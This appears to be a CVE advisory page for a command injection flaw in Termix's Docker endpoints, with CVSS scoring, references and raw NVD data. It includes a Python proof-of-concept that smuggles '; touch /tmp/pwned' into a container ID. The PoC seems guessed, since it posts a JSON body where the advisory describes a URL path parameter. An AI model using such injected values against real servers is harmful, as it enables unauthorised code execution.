CVE-2026-42454

Description

Termix is a web-based server management platform with SSH terminal, tunneling, and file editing capabilities. Prior to version 2.1.0, all Docker container management endpoints in Termix interpolate the containerId URL path parameter and WebSocket message field directly into shell commands executed via ssh2.Client.exec() on remote managed servers without any sanitization or validation. An authenticated attacker can inject arbitrary OS commands by crafting a malicious container ID, achieving Remote Code Execution on any managed server. This issue has been patched in version 2.1.0.

CVSS Details

CVSS Score

9.9

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Termix < 2.1.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# PoC for CVE-2026-42454 Termix RCE
# This script simulates sending a malicious containerId to inject commands.

target_url = "http://target-termix-server/api/containers/stop"
session_cookie = "valid_attacker_session_token"

# The payload attempts to create a file as a proof of concept.
# It assumes the backend command looks like: docker stop <containerId>
# We append `; touch /tmp/pwned` to execute an extra command.
malicious_id = "dummy; touch /tmp/pwned"

headers = {
    "Cookie": f"session={session_cookie}"
}

data = {
    "containerId": malicious_id
}

try:
    response = requests.post(target_url, headers=headers, json=data)
    if response.status_code == 200:
        print("[+] Payload sent successfully. Check /tmp/pwned on the remote server.")
    else:
        print(f"[-] Request failed: {response.status_code}")
except Exception as e:
    print(f"[!] Error: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-42454
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-42454
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-42454/
[4] VulDB https://vuldb.com/cve/CVE-2026-42454
[5] https://github.com/Termix-SSH/Termix/releases/tag/release-2.1.0-tag
[6] https://github.com/Termix-SSH/Termix/security/advisories/GHSA-c2g2-hqgq-6w9v

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-42454", "sourceIdentifier": "[email protected]", "published": "2026-05-08T23:16:39.097", "lastModified": "2026-05-08T23:16:39.097", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "Termix is a web-based server management platform with SSH terminal, tunneling, and file editing capabilities. Prior to version 2.1.0, all Docker container management endpoints in Termix interpolate the containerId URL path parameter and WebSocket message field directly into shell commands executed via ssh2.Client.exec() on remote managed servers without any sanitization or validation. An authenticated attacker can inject arbitrary OS commands by crafting a malicious container ID, achieving Remote Code Execution on any managed server. This issue has been patched in version 2.1.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "baseScore": 9.9, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.1, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-78"}]}], "references": [{"url": "https://github.com/Termix-SSH/Termix/releases/tag/release-2.1.0-tag", "source": "[email protected]"}, {"url": "https://github.com/Termix-SSH/Termix/security/advisories/GHSA-c2g2-hqgq-6w9v", "source": "[email protected]"}]}}